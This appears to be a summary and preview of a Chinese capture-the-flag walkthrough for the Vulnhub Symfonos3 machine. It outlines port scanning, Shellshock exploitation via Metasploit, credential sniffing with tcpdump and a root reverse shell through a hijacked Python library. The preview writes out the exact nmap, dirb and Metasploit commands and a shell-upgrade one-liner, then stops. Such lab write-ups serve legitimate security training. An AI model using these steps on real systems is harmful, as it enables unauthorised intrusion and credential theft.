主要观点总结
本文描述了使用Vulnhub的Symfonos3镜像进行渗透测试的过程,包括导入镜像、端口扫描、服务路径暴破、利用Shellshock漏洞获取Shell、修改攻击机端口、下载并运行pspy64获取关键文件,使用tcpdump抓包,最后通过修改Python库文件反弹shell的过程。
关键观点总结
关键观点1: 导入镜像并获取靶机IP地址。
使用Workstation导入Symfonos3镜像,直接在console上查看靶机的IP地址。
关键观点2: 端口扫描和服务路径暴破。
使用nmap进行端口扫描,发现靶机开放的端口及服务,通过dirb进行路径暴破,获取到http://192.168.88.138/cgi-bin。
关键观点3: 利用Shellshock漏洞获取Shell。
猜测http://192.168.88.138/cgi-bin存在Shellshock漏洞,利用MSF(Metasploit Framework)搜索并利用该漏洞,获取到靶机的Shell。
关键观点4: 修改攻击机端口和下载pspy64。
在MSF的shell下设置攻击机端口,下载pspy64工具,通过该工具获取到关键文件/opt/ftpclient/ftpclient.py。
关键观点5: 使用tcpdump抓包和反弹shell。
使用tcpdump在靶机上抓包,获取用户名和密码。然后利用Python库文件替换技巧反弹shell,最终获得root权限。
文章预览
本周实践的是vulnhub的symfonos3镜像, 下载地址,https://download.vulnhub.com/symfonos/symfonos3v2.7z, 用workstation导入成功, console上直接能看到靶机的ip地址,192.168.88.138, 接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.88.138, 发现靶机开了21端口的ftp服务、22端口的ssh服务、80端口的http服务, 对http服务的路径进行暴破,dirb http://192.168.88.138, 获取到http://192.168.88.138/cgi-bin, 对http://192.168.88.138/cgi-bin进一步扫描, 获取到http://192.168.88.138/cgi-bin/underworld, cgi猜测有shellshock漏洞,在msf里搜索利用方法search shellshock, use exploit/multi/http/apache_mod_cgi_bash_env_exec show options set RHOSTS 192.168.88.138 set TARGETURI /cgi-bin/underworld exploit 获取到msf的shell,然后修改攻击机端口再获取一个,set LPORT 4455, 在其中一个msf的shell下进入普通shell, 转成交互式的,python -c 'import pty;pty.spawn("/bin/bash")'
………………………………